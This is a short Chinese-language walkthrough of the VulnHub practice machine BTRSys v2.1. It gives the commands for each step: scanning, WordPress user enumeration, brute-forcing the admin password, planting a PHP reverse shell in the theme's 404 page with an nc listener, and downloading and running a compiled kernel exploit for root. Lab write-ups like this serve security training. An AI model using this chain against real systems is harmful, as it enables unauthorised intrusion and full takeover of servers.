BTRSys: v2.1
阿新 • • 發佈:2020-10-18
靶機地址:https://www.vulnhub.com/entry/btrsys-v21,196/
靶機難度:初級/中等
nmap掃描獲得靶機ip:192.168.40.141
nmap -sP 192.168.40.0/24
掃描靶機開放埠,開放了21、22、80埠
nmap -sV -p- 192.168.40.141
用dirb掃描發現該網站是wordpress搭建的
dirb http://192.168.40.141
用wpscan列舉使用者和外掛,找到了兩個使用者btrisk和admin
wpscan --url http://192.168.40.141/wordpress -e u vp
爆破出使用者admin的密碼admin
wpscan --url http://192.168.40.141/wordpress -U admin -P /usr/share/wordlists/rockyou.txt
登入wordpress,發現可以修改頁面
把php的反彈shell寫入404頁面(這裡反彈shell用的是kali的/usr/share/webshells/php/php-reverse-shell.php),並且用kali的nc監聽,然後訪問頁面http://ip/wordpress/wp-content/themes/twentyfourteen/404.php
用python3開啟互動式tty
檢視核心版本為ubuntu 4.4.0
uname -a
在kali上面找一下對應版本的提權指令碼
searchsploit ubuntu 4.4.0 | grep "Privilege Escalation
將提權指令碼編譯後放到/var/www/html,讓靶機wget到/tmp目錄執行
searchsploit -m 44298 gcc 44298.c -o getroot mv getroot /var/www/html/ /etc/init.d/apache2 start
成功提權
參考資料:https://www.hackingarticles.in/hack-btrsys-v2-1-vm-boot2root-challenge/